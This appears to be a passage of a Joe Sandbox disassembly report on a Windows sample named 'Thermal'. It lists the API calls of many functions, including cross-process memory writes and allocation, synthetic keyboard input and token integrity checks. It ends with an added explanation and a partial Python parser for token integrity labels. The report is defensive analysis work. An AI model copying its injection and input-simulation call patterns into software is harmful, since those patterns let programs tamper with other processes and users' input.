                                                      • Opcode Fuzzy Hash: 53db46a055c03380cdc48ee5a41d7ab87af9c5cb1a5c39d5aa47c799a180cb09
                                                      • Instruction Fuzzy Hash: 3D512375504345DFDF16DF69C880AFA7BB4EF6A320F148055EC95AB2A0D734AC82CB62
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: ERCP
                                                      • API String ID: 2532777613-1384759551
                                                      • Opcode ID: 803103e9d2b078c203ceb994bf586130a36e4d2614391bfe7c8bf7ee3c608a8f
                                                      • Instruction ID: 69732a6b9ba2fcaa2af1535d09fdc271776ea2a214ae8d0399ee42ef525aa9f1
                                                      • Opcode Fuzzy Hash: 803103e9d2b078c203ceb994bf586130a36e4d2614391bfe7c8bf7ee3c608a8f
                                                      • Instruction Fuzzy Hash: B45193B190070A9BDB28CF65D8817AABBF8FF04714F24856EF54ADB251E770D685CB80
                                                      APIs
                                                        • Part of subcall function 00181CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00179E4E,?,?,00000034,00000800,?,00000034), ref: 00181CE5
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0017A3F7
                                                        • Part of subcall function 00181C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00179E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00181CB0
                                                        • Part of subcall function 00181BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00181C08
                                                        • Part of subcall function 00181BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00179E12,00000034,?,?,00001004,00000000,00000000), ref: 00181C18
                                                        • Part of subcall function 00181BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00179E12,00000034,?,?,00001004,00000000,00000000), ref: 00181C2E
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0017A464
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0017A4B1
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 1eba8b33b1a373979134ee87afb1da287a2e8a5bffae98d9261041c88ad28d0b
                                                      • Instruction ID: e8ae71f2523720a6a1b7e649594020619afb7033257d32c0b4cd6827e474897e
                                                      • Opcode Fuzzy Hash: 1eba8b33b1a373979134ee87afb1da287a2e8a5bffae98d9261041c88ad28d0b
                                                      • Instruction Fuzzy Hash: F441287294021CBEDB10EBA4CD85ADEBBB8AF59300F048195FA55A7180DB716F85CBA1
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001A7A86
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001A7A9A
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 001A7ABE
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: d98a2470fcb5f75faf98e1e9f3b3b62fba80cc7dae09e921d8aa510236a35701
                                                      • Instruction ID: 0f66ee56bab088ac4fb1d6492e322694189bf8665d0fec40ace7b0db250c7ce0
                                                      • Opcode Fuzzy Hash: d98a2470fcb5f75faf98e1e9f3b3b62fba80cc7dae09e921d8aa510236a35701
                                                      • Instruction Fuzzy Hash: 4D21BF32610218BFDF218F50CC82FEE3B69EB49724F150214FE156B1D0DBB1A9948BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001A826F
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001A827D
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001A8284
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: cbcdde1854d6bb43052fabe7b72992b72fdd90ca7a35b71de01955c005324942
                                                      • Instruction ID: 44e0283d445e4dd943134a9fadab528a0ac927d55aeb4b197a2b30cda04a726a
                                                      • Opcode Fuzzy Hash: cbcdde1854d6bb43052fabe7b72992b72fdd90ca7a35b71de01955c005324942
                                                      • Instruction Fuzzy Hash: 5A2192B5604249AFEB11DF54DCC5D7B37EDEB5A354B040159FA019B2A1CB70EC51CBA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001A7360
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001A7370
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001A7395
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 5aa93c06f29b5511a19ebf233500c7caa567d3ab1795387a4c7b8b1887104366
                                                      • Instruction ID: eacd7073c2aa40f41fafbf08fe1f7c6425e965766962a9be892b55c96e469391
                                                      • Opcode Fuzzy Hash: 5aa93c06f29b5511a19ebf233500c7caa567d3ab1795387a4c7b8b1887104366
                                                      • Instruction Fuzzy Hash: D521B036614118BFDF128F54DC85EBF37AAEF8A760F128124FA009B1D0D771AC519BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001A7D97
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001A7DAC
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001A7DB9
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 63f9baae683d0c28e15444c69a44be216aeac768772753993fdb9da5b465347f
                                                      • Instruction ID: 90d72d6486269a713a9197caf595d3b58c0ebaf9dd5411bd1f1a988ed6278f67
                                                      • Opcode Fuzzy Hash: 63f9baae683d0c28e15444c69a44be216aeac768772753993fdb9da5b465347f
                                                      • Instruction Fuzzy Hash: 7911E376244248BADF249FA4CC45FFB37A9EF89B24F114619FB41A60D0D771A851CB20
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0016027A,?), ref: 0019C6E7
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0019C6F9
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                      • API String ID: 2574300362-1816364905
                                                      • Opcode ID: fc39d3a13f3496d124bd9bbd9ca1727d6eafeb87bec82facd6b334e9730e9762
                                                      • Instruction ID: 575e9fd655781e96d73ee8e7947634986a57b366fbb0f3d7dfc63aeb2349a292
                                                      • Opcode Fuzzy Hash: fc39d3a13f3496d124bd9bbd9ca1727d6eafeb87bec82facd6b334e9730e9762
                                                      • Instruction Fuzzy Hash: E8E0C23C100303CFDB258B69CC88A4376D8FF08745B40842AE8D5D2610D770C8C08F50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00134B44,?,001349D4,?,?,001327AF,?,00000001), ref: 00134B85
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00134B97
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: e6b20792fb4fc0a162561f76cc19811a9831739680ac2b750aaf4f772ebc9357
                                                      • Instruction ID: 7630b040b5309b005fa1df6c369ecba902f960a58d1b0250832e44d5ee49e6d2
                                                      • Opcode Fuzzy Hash: e6b20792fb4fc0a162561f76cc19811a9831739680ac2b750aaf4f772ebc9357
                                                      • Instruction Fuzzy Hash: 9AD017705107128FE7219F39DC18B47B6E8AF08392F51882AD4A6E2A94E770E8C0CA10
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00134AF7,?), ref: 00134BB8
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00134BCA
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: f2dd6c7757220d1fa80a19257648d220a4d1fd47392e04d32899a4f27f4fe9be
                                                      • Instruction ID: 4c5f4904b9a2588b03beeff84ce3944242654d772df04bcb5ec725f48f38ddb7
                                                      • Opcode Fuzzy Hash: f2dd6c7757220d1fa80a19257648d220a4d1fd47392e04d32899a4f27f4fe9be
                                                      • Instruction Fuzzy Hash: AED017715107138FD7219F35DC08B47B6E9AF09391F119C6AD4E6D2A98EB70E8C0CA61
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,001A1696), ref: 001A1455
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001A1467
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: 1711d23b22477340fa336c4611b5a19011f025ef8532a41840848c3de6e6ea20
                                                      • Instruction ID: 89d7d6f1b3d0f4cdc4c11ac2a2ea3e8fb2413d74fef9f82106f15af58e6771f3
                                                      • Opcode Fuzzy Hash: 1711d23b22477340fa336c4611b5a19011f025ef8532a41840848c3de6e6ea20
                                                      • Instruction Fuzzy Hash: 0ED01739550723DFD7219F79C8086077AE8AF1A395F11CE2AD4E6D2660EB70D8C0CA50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00135E3D), ref: 001355FE
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00135610
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,001993DE,?,001B0980), ref: 001997D8
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001997EA
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 0019E7A7
                                                      • CharLowerBuffW.USER32(?,?), ref: 0019E7EA
                                                        • Part of subcall function 0019DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0019DEAE
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0019E9EA
                                                      • _memmove.LIBCMT ref: 0019E9FD
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 001987AD
                                                      • CoUninitialize.OLE32 ref: 001987B8
                                                        • Part of subcall function 001ADF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00198A0E,?,00000000), ref: 001ADF71
                                                      • VariantInit.OLEAUT32(?), ref: 001987C3
                                                      • VariantClear.OLEAUT32(?), ref: 00198A94
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001B3C4C,?), ref: 00178308
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001B3C4C,?), ref: 00178320
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,001B0988,000000FF,?,00000000,00000800,00000000,?,001B3C4C,?), ref: 00178345
                                                      • _memcmp.LIBCMT ref: 00178366
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      APIs
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0019F526
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0019F534
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0019F5F4
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0019F603
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      APIs
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0017A68A
                                                      • __itow.LIBCMT ref: 0017A6BB
                                                        • Part of subcall function 0017A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0017A976
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0017A724
                                                      • __itow.LIBCMT ref: 0017A77B
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 001970BC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 001970CC
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00197130
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0019713C
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      APIs
                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,001B0980), ref: 00196B92
                                                      • _strlen.LIBCMT ref: 00196BC4
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001A8F03
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 001AB1D2
                                                      • GetWindowRect.USER32(?,?), ref: 001AB248
                                                      • PtInRect.USER32(?,?,001AC6BC), ref: 001AB258
                                                      • MessageBeep.USER32(00000000), ref: 001AB2C9
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00181326
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00181342
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001813A8
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001813FA
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cff2927118826f5a75c01a232ce8ca4da6a73d6cc7463ca1eebcd9030cca13c6
                                                      • Instruction ID: 925b51498d4608b9408339a120acd9d980be65ba1adb9613d964989f58d1c450
                                                      • Opcode Fuzzy Hash: cff2927118826f5a75c01a232ce8ca4da6a73d6cc7463ca1eebcd9030cca13c6
                                                      • Instruction Fuzzy Hash: 13313B32940608BEFB35A6258C057FE7BAEBB49330F04431AE89152AD1D3748F869F51
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00181465
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00181481
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 001814E0
                                                      • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00181532
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 69223195abe09c10cffe21fba3096f4eb47deb2ce753f2226dcd2af679a4e46e
                                                      • Instruction ID: df054aed776d947b22218350dbf1e632ac097bf458996c1f07f7e80a14cddb3d
                                                      • Opcode Fuzzy Hash: 69223195abe09c10cffe21fba3096f4eb47deb2ce753f2226dcd2af679a4e46e
                                                      • Instruction Fuzzy Hash: B2316C329402087EFF35AB658C04BFABBADAB89320F48431AE481525D1C3748F878F61
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0015642B
                                                      • __isleadbyte_l.LIBCMT ref: 00156459
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00156487
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001564BD
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 787be7111ef3261c3e659cd9a41537ed8921bfd677b3caedc07dccd1189cf874
                                                      • Instruction ID: fe5c5ac924ab9c6e188a6163b92dfa9653b3cc6e369481f488aecb99d0e39e21
                                                      • Opcode Fuzzy Hash: 787be7111ef3261c3e659cd9a41537ed8921bfd677b3caedc07dccd1189cf874
                                                      • Instruction Fuzzy Hash: 9631D031600296EFDB258F65CC44BAB7BA5FF40322F554128FC748B1A0EB31E854DB90
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 001A553F
                                                        • Part of subcall function 00183B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00183B4E
                                                        • Part of subcall function 00183B34: GetCurrentThreadId.KERNEL32 ref: 00183B55
                                                        • Part of subcall function 00183B34: AttachThreadInput.USER32(00000000,?,001855C0), ref: 00183B5C
                                                      • GetCaretPos.USER32(?), ref: 001A5550
                                                      • ClientToScreen.USER32(00000000,?), ref: 001A558B
                                                      • GetForegroundWindow.USER32 ref: 001A5591
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 8b120c60617544cf95be05d07356de13db783e3c543be5bcc64e3bd630671f8a
                                                      • Instruction ID: 7b12db0fbbb37d633545d06454e05957bc1b6e0220a37ac5a7c410d455617acf
                                                      • Opcode Fuzzy Hash: 8b120c60617544cf95be05d07356de13db783e3c543be5bcc64e3bd630671f8a
                                                      • Instruction Fuzzy Hash: C9312D71900118AFDB00EFA5D8859EFB7F9EFA8304F10406AE915E7241EB71AE518FA0
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • GetCursorPos.USER32(?), ref: 001ACB7A
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0015BCEC,?,?,?,?,?), ref: 001ACB8F
                                                      • GetCursorPos.USER32(?), ref: 001ACBDC
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0015BCEC,?,?,?), ref: 001ACC16
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 38d9b09270277612fe60bd0aaef8fdba9f385033bf933b4f61462499b0edd301
                                                      • Instruction ID: c1fe198cc34cc72e37d7dc9331da407fe256431566139d7f309efac86b74fee7
                                                      • Opcode Fuzzy Hash: 38d9b09270277612fe60bd0aaef8fdba9f385033bf933b4f61462499b0edd301
                                                      • Instruction Fuzzy Hash: 2E31D238600158AFCB258F58CC89EFE7BB5EB4A350F044099F9059B661C3329D91EFE0
                                                      APIs
                                                      • __setmode.LIBCMT ref: 00140BE2
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00187E51,?,?,00000000), ref: 00134041
                                                        • Part of subcall function 0013402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00187E51,?,?,00000000,?,?), ref: 00134065
                                                      • _fprintf.LIBCMT ref: 00140C19
                                                      • OutputDebugStringW.KERNEL32(?), ref: 0017694C
                                                        • Part of subcall function 00144CCA: _flsall.LIBCMT ref: 00144CE3
                                                      • __setmode.LIBCMT ref: 00140C4E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: 6f5aebb4480de76c8f2650991ad891228f21eb77c0ef9d1cc4fa366fb49e872c
                                                      • Instruction ID: 2541fb67b8f85befd7b767c3f0b136e36dfbc380b0d21995904d20ec12f1c1a6
                                                      • Opcode Fuzzy Hash: 6f5aebb4480de76c8f2650991ad891228f21eb77c0ef9d1cc4fa366fb49e872c
                                                      • Instruction Fuzzy Hash: C9115472904208AFDB08B7A4AC83AFEBB28DF65320F104159F204671E2DF311D4297A0
                                                      APIs
                                                        • Part of subcall function 00178D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00178D3F
                                                        • Part of subcall function 00178D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00178D49
                                                        • Part of subcall function 00178D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D58
                                                        • Part of subcall function 00178D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D5F
                                                        • Part of subcall function 00178D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00178D75
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001792C1
                                                      • _memcmp.LIBCMT ref: 001792E4
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0017931A
                                                      • HeapFree.KERNEL32(00000000), ref: 00179321
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                       • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                       • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: e15c75a4dee33d989c753334eae4f8d3e62dea76ebd42255281cec62ec46d6c5
                                                      • Instruction ID: b22c3677bcf4e700908c97f3deb6c3e3c98ed936f2ad85aee8ffa23bc061c05e
                                                      • Opcode Fuzzy Hash: e15c75a4dee33d989c753334eae4f8d3e62dea76ebd42255281cec62ec46d6c5
                                                      • Instruction Fuzzy Hash: 6621B071E40108EFDB10DFA4C945BEEB7B8FF44301F048059E848A7291D774AE48CB90
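The subcall at 00178D28 shows the documented two-call pattern for GetTokenInformation(TokenIntegrityLevel): a first call with a zero-length buffer that fails, GetLastError to confirm it was only a size query, a heap allocation of the returned size, and a second call that fills a TOKEN_MANDATORY_LABEL. The integrity level itself is the last sub-authority of the S-1-16-… SID that the structure points to, and on 32-bit code the SID pointer refers into the same heap buffer. The following is an added example, not code from the sample or from Joe Sandbox, that parses such a buffer offline; the buffer contents, the base address 0x010D1234 and the constructed labels are made up for the demonstration.

```python
# Added example (not from the report or the sample): decode a 32-bit
# TOKEN_MANDATORY_LABEL as returned by GetTokenInformation(TokenIntegrityLevel).
import struct
from typing import Dict

# winnt.h SECURITY_MANDATORY_*_RID values (last sub-authority of S-1-16-<rid>)
MANDATORY_LABELS: Dict[int, str] = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected Process",
}
SECURITY_MANDATORY_LABEL_AUTHORITY = 16
SE_GROUP_INTEGRITY = 0x00000020


def parse_sid(buf: bytes, off: int = 0) -> str:
    """Parse a binary SID at buf[off:] into its S-R-A-S... string form.
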